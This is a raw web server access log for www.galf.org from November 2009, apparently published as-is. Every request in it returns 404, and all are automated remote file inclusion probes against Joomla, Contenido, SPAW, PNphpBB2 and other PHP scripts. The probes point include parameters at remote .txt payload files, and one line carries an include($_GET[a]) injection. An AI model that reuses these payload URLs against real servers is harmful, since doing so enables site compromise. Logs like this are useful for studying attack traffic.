222.237.78.176 - - [23/Nov/2009:02:27:23 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:27:23 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:31 -0800] "GET /logs/access_090525.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:31 -0800] "GET /logs/access_090831.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:31 -0800] "GET /logs/access_090907.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:31 -0800] "GET /logs/access_090629.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:31 -0800] "GET /logs/access_090511.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:31 -0800] "GET /logs/access_090608.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:31 -0800] "GET /logs/access_090727.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:02:27:35 -0800] "GET /logs/access_090914.log//error.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:02:27:35 -0800] "GET /error.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:02:27:35 -0800] "GET /logs//error.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:36 -0800] "GET /logs/access_090504.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:36 -0800] "GET /logs/access_090810.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:36 -0800] "GET /logs/access_090622.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:36 -0800] "GET /logs/access_090413.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:36 -0800] "GET /logs/access_090824.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:36 -0800] "GET /logs/access_090817.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:36 -0800] "GET /logs/access_090330.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:28:07 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:28:08 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:28:09 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:28:22 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:28:22 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:28:22 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:28:42 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:28:43 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:28:43 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.129.64.89 - - [23/Nov/2009:02:29:03 -0800] "GET /logs/access_091019.log//?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/aisatriani/paket/safe.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:30:00 -0800] "GET /logs/access_090601.log//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:30:11 -0800] "GET /logs/access.log%20%20//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:30:15 -0800] "GET /logs/access_090601.log//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.71.237.150 - - [23/Nov/2009:02:30:35 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
200.71.237.150 - - [23/Nov/2009:02:30:35 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:30:42 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:30:42 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:30:42 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:30:50 -0800] "GET /logs/access_090601.log%20%20//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:30:55 -0800] "GET /logs/access_090601.log//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:31:21 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:31:21 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:31:21 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:31:31 -0800] "GET /logs/access_090601.log%20//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:31:42 -0800] "GET /logs/access_090601.log///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:31:44 -0800] "GET /include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:31:44 -0800] "GET /logs//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:31:45 -0800] "GET /logs/access_090601.log%20//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:31:45 -0800] "GET /logs/access_090309.log%20%20//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:31:55 -0800] "GET /logs/access_090601.log///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:32:08 -0800] "GET /logs/access.log%20%20//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:32:14 -0800] "GET /logs/access.log%20%20///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:32:15 -0800] "GET /logs/access.log%20%20///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:32:16 -0800] "GET /logs/access.log%20%20///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:32:21 -0800] "GET /logs/access_090601.log///conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:32:21 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:32:21 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:32:27 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:32:27 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:32:27 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:32:34 -0800] "GET /include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:32:34 -0800] "GET /logs/access_090309.log%20%20//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:32:35 -0800] "GET /logs//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:02:32:43 -0800] "GET /logs/access_090525.log//include/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:32:50 -0800] "GET /logs/access_090601.log%20%20//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:02:32:56 -0800] "GET /logs/access.log//include/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:33:04 -0800] "GET /logs/access_090601.log%20%20///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:33:22 -0800] "GET /logs/access_090601.log%20%20///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:33:34 -0800] "GET /logs/access_090601.log///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:33:38 -0800] "GET /logs/access_090525.log%20%20//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:33:45 -0800] "GET /logs/access.log%20%20//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:33:56 -0800] "GET /logs/access.log%20%20//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:34:00 -0800] "GET /logs/access_090525.log%20%20//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:34:28 -0800] "GET /logs/access_090601.log%20%20//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:34:37 -0800] "GET /logs/access_090601.log%20%20//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:34:37 -0800] "GET /logs/access_090601.log%20///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
157.100.230.82 - - [23/Nov/2009:02:34:49 -0800] "GET /logs/access_090622.log//include/lib.inc.php?site_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.81.130.215 - - [23/Nov/2009:02:34:51 -0800] "GET //e404.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:35:01 -0800] "GET /logs/access.log%20%20///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:35:20 -0800] "GET /logs//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:35:20 -0800] "GET /include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:35:20 -0800] "GET /logs/access_090309.log%20%20//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:35:53 -0800] "GET /logs/access_090601.log%20%20///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:36:26 -0800] "GET /logs/access_090601.log%20///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:36:50 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:36:56 -0800] "GET /include/write.php?dir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:36:56 -0800] "GET /logs//include/write.php?dir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:36:56 -0800] "GET /logs/access_090309.log%20%20//include/write.php?dir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:02:37:04 -0800] "GET /logs/access_090525.log%20%20//include/write.php?dir=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:37:52 -0800] "GET /logs/access_090525.log%20%20//include/write.php?dir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [23/Nov/2009:02:38:02 -0800] "GET /components/errors.php?error=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [23/Nov/2009:02:38:02 -0800] "GET /logs//components/errors.php?error=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [23/Nov/2009:02:38:02 -0800] "GET /logs/access_090622.log%20%20//components/errors.php?error=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:38:15 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
211.234.106.119 - - [23/Nov/2009:02:38:31 -0800] "GET //e404.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
203.234.62.129 - - [23/Nov/2009:02:38:51 -0800] "GET //e404.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
208.81.130.215 - - [23/Nov/2009:02:38:52 -0800] "GET /logs/access.log///e404.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
208.81.130.215 - - [23/Nov/2009:02:38:52 -0800] "GET //e404.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
208.81.130.215 - - [23/Nov/2009:02:38:52 -0800] "GET /logs///e404.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
209.216.203.109 - - [23/Nov/2009:02:39:37 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [23/Nov/2009:02:39:37 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [23/Nov/2009:02:39:39 -0800] "GET /logs/access_091102.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [23/Nov/2009:02:40:27 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.knotnilla.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [23/Nov/2009:02:40:27 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.knotnilla.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [23/Nov/2009:02:40:27 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.knotnilla.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:40:39 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
202.131.226.52 - - [23/Nov/2009:02:41:01 -0800] "GET /logs/access_090921.log%20%20//components/errors.php?error=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:02:42:53 -0800] "GET /logs/access_090914.log%20%20//error.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:02:43:20 -0800] "GET /logs/access.log%20%20//bbs/skin/happycast_category_brown/setup.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.97.219.4 - - [23/Nov/2009:02:43:25 -0800] "GET /bbs/skin/happycast_category_brown/setup.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.97.219.4 - - [23/Nov/2009:02:43:34 -0800] "GET /logs//bbs/skin/happycast_category_brown/setup.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.97.219.4 - - [23/Nov/2009:02:44:02 -0800] "GET /bbs/skin/happycast_category_brown/setup.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
